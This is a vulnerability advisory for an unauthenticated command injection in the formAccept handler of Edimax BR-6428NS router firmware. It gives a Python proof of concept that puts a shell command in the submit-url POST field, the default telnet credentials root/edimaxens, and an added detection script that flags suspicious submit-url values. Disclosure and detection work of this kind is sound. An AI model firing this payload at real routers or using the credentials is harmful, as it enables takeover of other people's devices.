Command Injection
Command injection without any limitations
Firmware
Wireless: Edimax home Wireless Routers N300
Firmware Version: BR-6428NS_v4_1.10
You can download the firmware at this website and use FirmAE to simulate the router environment.
FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin (This will take a while, please be patient :)
Description
The vulnerability was found in /bin/webs, in the function formAccept. As the PoC shows, the command is passed in the submit-url POST parameter.
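PoC
```python
import requests

# Command to run on the router; it creates a marker file in /tmp.
command = "touch /tmp/Swe3ty3"
url = "http://192.168.2.1/goform/formAccept"
# The command is sent as the value of the submit-url form field.
data = {
    "submit-url": command
}
r = requests.post(url, data=data)
print(r.text)
```
Use root/edimaxens to telnet to the router:
```
telnet 192.168.2.1
```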
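A detection check for the request the PoC above sends, as an added example that is not part of the original advisory: it flags POSTs to /goform/formAccept whose submit-url value is not a plain local page path. The allowed-path pattern, the sample requests and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/goform/formAccept"   # handler named in the advisory
PARAM = "submit-url"              # form field that carries the command in the PoC
# Assumption: a legitimate value is a short local page path such as "/index.asp".
SAFE_VALUE = re.compile(r"/[A-Za-z0-9_\-./]{0,127}")


def suspicious_values(method, path, body):
    """Return the submit-url values of one request that are not a plain local path."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    # requests.post(url, data={...}) sends a urlencoded form body, so parse it as one.
    fields = parse_qs(body, keep_blank_values=True)
    return [v for v in fields.get(PARAM, [])
            if not SAFE_VALUE.fullmatch(v) or ".." in v]


def scan(requests_seen):
    """Map request index -> offending values for every flagged request."""
    hits = {}
    for i, (method, path, body) in enumerate(requests_seen):
        bad = suspicious_values(method, path, body)
        if bad:
            hits[i] = bad
    return hits


# Constructed sample requests (method, path, urlencoded body); not captured traffic.
SAMPLES = [
    ("POST", "/goform/formAccept", "submit-url=%2Findex.asp"),             # assumed benign
    ("POST", "/goform/formAccept", "submit-url=touch+%2Ftmp%2FSwe3ty3"),   # PoC value
    ("POST", "/goform/formAccept", "submit-url=%2Findex.asp%3Becho+test"), # path plus extra text
    ("POST", "/goform/formOther", "submit-url=touch+%2Ftmp%2Fx"),          # hypothetical other handler
    ("GET", "/goform/formAccept", ""),                                     # not a form POST
]

if __name__ == "__main__":
    for idx, values in scan(SAMPLES).items():
        print(f"request {idx}: unexpected {PARAM} value(s): {values}")
```

The same allow-list can be applied in a reverse proxy or IDS rule in front of the management interface; it does not replace fixing the handler in the firmware.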

